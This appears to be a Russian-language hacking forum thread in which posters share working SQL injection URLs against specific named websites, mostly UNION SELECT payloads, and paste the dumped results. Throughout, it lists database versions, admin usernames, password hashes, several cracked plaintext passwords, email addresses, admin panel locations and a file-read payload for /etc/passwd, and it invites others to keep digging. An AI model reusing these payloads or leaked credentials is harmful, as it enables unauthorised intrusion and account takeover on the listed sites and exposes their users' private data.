http://www.nzaf.org.nz/ Code: http://www.nzaf.org.nz/articles.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database())+from+admin/* Осталось подобрать колонки в таблице admin...
http://www.friarsgardens.co.nz/ Code: http://www.friarsgardens.co.nz/garden.php?id=-1+union+select+1,concat_ws(0x3a,username,passwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+users/* admin:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
unonamebel.ru HTML: http://www.unonamebel.ru/shop/?dir=1+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7/* USER:uno_mebel@localhost VERSION:4.1.21-log DATABASE:db_uno_mebel
www.welcomenet.ch Code: https://welcomenet.ch/onlinebooking/sites/angebotunddaten.php?hotelid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users/* 4.0.18:root@localhost:welcodat
www.wichita.co.uk Code: http://www.wichita.co.uk/productdetails.php?id=-1+union+select+convert(concat_ws(0x3a,version(),user(),database())+using+latin1),2,3,4/* 4.1.10a-standard-log:admin@localhost:wichita
www.gramis.com www.gramis.com HTML: http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5/* 4.1.22-log:gramis@localhost:gramis HTML: http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(username,0x3a,password),5+FROM+users+LIMIT+0,1/* admin:babelfi67 Админка: http://gramis.com/admin/index.php HTML: http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(user_id,0x3a,username,0x3a,user_password,0x3a,user_icq),5+FROM+phpbb_users+LIMIT+1,1/* 2:admin:f7c2d7fc1be27fcb6fc6d6dace13525e:::babelfi67 Вход на форум: http://www.gramis.com/phpbb/login.php
интересная скуль код: http://angara.ur.ru/?page=serv&id=-1014+union+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1/* админских таблиц 116!!! шт. Кому интересно,делайте выводы
versii.com.ua Code: http://versii.com.ua/telegraf/print.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9/* 5.0.45-log:versii@localhost:versii Админка: Code: http://versii.com.ua/admin/
http://www.trinidadexpress.com/index.pl/article_news?id=161245965+UNION+SELECT+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 4.0.27-standard-log csite01@AdServNode1 непонятная админка: http://admin.trinidadexpress.com/ логин:пароль carlos:carlos
MySQL Injection: http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,concat(user,password,host),3,4,5,6,7,8,9,10,11,12,13,concat(USER(),VERSION(),DATABASE()),15,16+FROM+mysql.user/* http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,2,3,4,5,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),7,8,9,10,11,12,13,14,15,16/* http://www.catltd.ru/prices.html?cg=-1+UNION+SELECT+1,2,3,4,USER(),6,7/* БД 4, а жаль. Таблицы с лету подобрать не удалось. Если кто будет ковыряться, плиз отпишитесь о результатах . MsSQL Injection: http://www.goodmoves.org.uk/findajob/findajobdet.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
www.big6.com HTML: http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5/* 5.0.37-log:big6@localhost:big6 Интересные таблицы: wp_users poll_user customers blog_users Т.к. сейчас слишком поздно, какие из них фальшивые разбираться не стал: HTML: http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email),2,3,4,5+FROM+wp_users+LIMIT+1,1/* 2:sue:e7e9ec3723447a642f762b2b6a15cfd7:[email protected]::bella ... HTML: http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(user_id,0x3a,username,0x3a,userpass),2,3,4,5+FROM+poll_user/* 1:admin:d158b1d234953b66bfc119f17f800b7b::big6php HTML: http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(customers_id,0x3a,customers_email_address,0x3a,customers_password),2,3,4,5+FROM+customers/* 1:root@localhost:d95e8fa7f20a009372eb3477473fcd34:1c::1cpassword P.S. С blog_users все то же самое, что и с wp_users =)
http://www.nram.org.nz/ Code: http://www.nram.org.nz/record.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+USERS+limit+0,1/*
Code: http://www.blogi.moje.pl/kategor.php?id_kategori=-1+union+select+1,VERSION(),3,4,5,6,7/* Code: http://tibiacz.com/kategorie_predmet.php?kat=-1+union+select+1,2,3,4,concat_ws(0x203a20,table_name,column_name),6,7,8,9,10,11+from+information_schema.columns/* Code: http://www.cytaty.pl/wyslij.php?numer=0+union+select+1,VERSION(),3,4,5,6/* Code: http://opisygg.szabloniki.com/index.php?pokaz_opis=-3871+union+select+1,VERSION(),3,4,5,6/* Code: http://www.ggopis.info/opis.php?id=0+UNION+SELECT+1,2,3,4,5,6,7/* Code: http://www.foto.oaza.pl/pokaz.php?strona=1&id=-9+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12/*
http://www.rabota-enisey.ru/news/?article=-1+or+1=@@version-- 'Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' http://www.rabota-enisey.ru/news/?article=-1+or+1=(select+db_name())-- rabota-enisey.ru http://www.rabota-enisey.ru/news/?article=-1+or+1=(select+system_user)-- rabota-enisey_ru ----------------------------------------------------------------------------- invest.trust.ru Инвестиционный банк «ТРАСТ» http://www.invest.trust.ru/about/press_centre/news/?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9/* 5.0.22/trust_rus/trust_bank@localhost http://www.invest.trust.ru/about/press_centre/news/?id=-1+union+select+1,concat_ws(0x2F,users_login,users_password,users_Email),3,4,5,6,7,8,9+from+site_users+limit+0,1/* логин/хеш/мейл root/e6b764d1ce8aec819b8aeebb2c4f45db/ Юзаем ANTICHAT ONLINE MD5 CRACK (http://md5.xek.cc/ ) получаем: e6b764d1ce8aec819b8aeebb2c4f45db - rjgtqrf76
Code: http://www.ptgem.pl/pokaz.php?idz=-9+union+select+1,2,3,VERSION(),5,6,7/* Code: http://www.foto-akcesoria.com.pl/index.php?i=produkt&nr=-9+union+select+VERSION(),2,3/* Code: http://www.emmanuel.home.pl/index.php?lang=uk&url2=art&info=-999+union+select+1,2,3,version(),5,6,7/*
www.slavishow.com HTML: http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(version(),0x3a,user(),0x3a,database()),3,4+LIMIT+170,2/* 5.0.32-Debian_7etch3-log:web_user@localhost:slavishow_web HTML: http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(id,0x3a,name,0x3a,pass),3,4+FROM+slavishow_web.admins+LIMIT+170,4/* 1:tester:09dc76b84e834f94643dde29695d28ec 2:dani:b5284b4b124260044f1a640fd6494b3f 3:joro:e10adc3949ba59abbe56e057f20f883e::123456 HTML: http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(user_id,0x3a,username,0x3a,user_password),3,4+FROM+db_Forum.tb_users+LIMIT+170,50/* 2:Aleko:f02123067c08a29eb91a894af3493bc8 3:darco:d8578edf8458ce06fbc5bb76a58c5ca4::qwerty (админ) http://forum.slavishow.com/login.php ... HTML: http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(login,0x3a,password,0x3a,e_mail,0x3a,realname),3,4+FROM+db_Forum.chat_users+LIMIT+170,50/* chat_admin:wiesteludi:0: (админ) http://chat.slavishow.com/ .SLAVI.:1:[email protected]:SLAVI ...
Одежда от Savage Ксения Собчак итд xD Единственное нарыл в users Marius:faktorius админку не нашёл admin:rfnz(админка(http://www.dm-centre.ru/admin.php)) ADMINer:9183f254e874a7ae034e68fd9f2053e1(форум)